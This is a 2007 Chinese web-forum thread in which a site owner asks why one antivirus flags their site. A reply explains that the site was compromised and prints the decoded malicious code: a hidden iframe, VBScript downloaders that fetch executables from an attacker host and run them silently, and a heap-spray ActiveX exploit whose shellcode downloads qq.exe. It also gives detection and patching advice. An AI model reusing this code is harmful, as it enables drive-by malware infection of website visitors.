rulioo - 2007-2-15 19:45:00
www.rulioo.com
只有瑞星报错~~ 其他的软件都不提示。
我下载了全部的代码,没有发现问题。
请教了~~~ 是不是。。。。。。
想不通
附件:
8453082007215193545.gif
mopery - 2007-2-15 20:27:00
<script language=javascript src=/testbak.js></script>
早就被挂马了:页面里被插入了上面这行脚本引用,另外还有下面这个宽高都是 0 的隐藏 iframe(用户看不到,但浏览器会照常加载)。
<iframe src=http://www.hb-hack.com/ppx/wm/520hack.htm width=0 height=0></iframe>
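解密后的代码如下。两段 VBScript 做的是同一件事:通过 classid 为 BD96C556-65A3-11D0-983A-00C04FC29E36 的对象(RDS.DataSpace)创建 Microsoft.XMLHTTP 和 Adodb.Stream,把远程文件下载到临时目录(GetSpecialFolder(2)),再用 Shell.Application 隐藏窗口执行。"Adodb.Stream" 被拆成四段再拼接,是为了躲避特征码匹配。访问过该页面的机器应检查临时目录里是否有 CiKE.exe 或 taskmgr.exe(正常的 taskmgr.exe 不在临时目录里)。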
Invalid keyboard code specified
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" /><title>5A0f4zBk</title></head><body><script>
t="<script language="VBScript"> on error resume next
Set adaWSAsjii__HSA = document.createElement("object")
adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
caogoogA1="Ado"
caogoogA2="db."
caogoogA3="Str"
caogoogA4="eam"
CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
Cnisjii__WA=CnisjIoa__WA
Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
opaipPada.type = 1
adagoogA.Open"GET","http://www.hb-hack.com/ppx/wm/wm1.exe",False
adagoogA.Send
Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
Set temp = fso.GetSpecialFolder(2)
filename=fso.BuildPath(temp,"CiKE.exe")
opaipPada.open
opaipPada.write adagoogA.responseBody
opaipPada.savetofile filename,2
opaipPada.close
Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
exc.ShellExecute filename,"","","open",0
</script>
<script language="VBScript"> on error resume next
Set adaWSAsjii__HSA = document.createElement("object")
adaWSAsjii__HSA.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set adagoogA = adaWSAsjii__HSA.CreateObject("Microsoft.XMLHTTP","")
caogoogA1="Ado"
caogoogA2="db."
caogoogA3="Str"
caogoogA4="eam"
CnisjIoa__WA=caogoogA1&caogoogA2&caogoogA3&caogoogA4
Cnisjii__WA=CnisjIoa__WA
Set opaipPada = adaWSAsjii__HSA.CreateObject(Cnisjii__WA,"")
opaipPada.type = 1
adagoogA.Open"GET","http://www.es86.com/pic/ddb/2006692151148920.gif",False
adagoogA.Send
Set fso = adaWSAsjii__HSA.CreateObject("Scripting.FileSystemObject","")
Set temp = fso.GetSpecialFolder(2)
filename=fso.BuildPath(temp,"taskmgr.exe")
opaipPada.open
opaipPada.write adagoogA.responseBody
opaipPada.savetofile filename,2
opaipPada.close
Set exc = adaWSAsjii__HSA.CreateObject("Shell.Application","")
exc.ShellExecute filename,"","","open",0
</script>
<script type="text/jscript">
function init() {
document.write("嬪榰mS梌lQ[]埆g\");
}
window.onload = init;
</script>"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script></body></html>
mopery - 2007-2-15 20:32:00
挂马页面还会再次跳转到另一个页面:
<frame src="http://www.hb-hack.com/qq.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
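代码解密后如下。这一段先做堆喷射,再用超长字符串调用 CLSID 为 {AC3A36A8-9BFF-410A-A33D-2279FFEB69D2} 的 ActiveX 控件的 LaunchP2PShare 方法,shellcode 末尾能看到 qq.exe 的下载地址。只有装了这个控件的机器才会受影响,这类机器需要升级该控件,或在浏览器里禁用它。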
<SCRIPT>var Words="<!-- axis' exploit! -->
<html>
<head>
<script language="javascript">
var heapSprayToAddress = 0x0c010101;
var shellcode = unescape(`d@hNVhVh%Vh`Vhy@€8E$EjYUVPh6/pEPE hjYbE ~.e@xeu EjYUXE$3Su PSjY$ju EjYU]$A[RZSR]Vs<xVv 3IA3:@uZZ$fK^]URLMONttp://www.hb-hack.com/qq.exe
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
<script>
function doTest()
{
com.LaunchP2PShare("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x0c", 10000);
}
</script>
</head>
<OBJECT ID="com" CLASSID="CLSID:{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}"></OBJECT>
<script>javascript:doTest();</script>
</html>
";document.write(unescape(Words))</SCRIPT>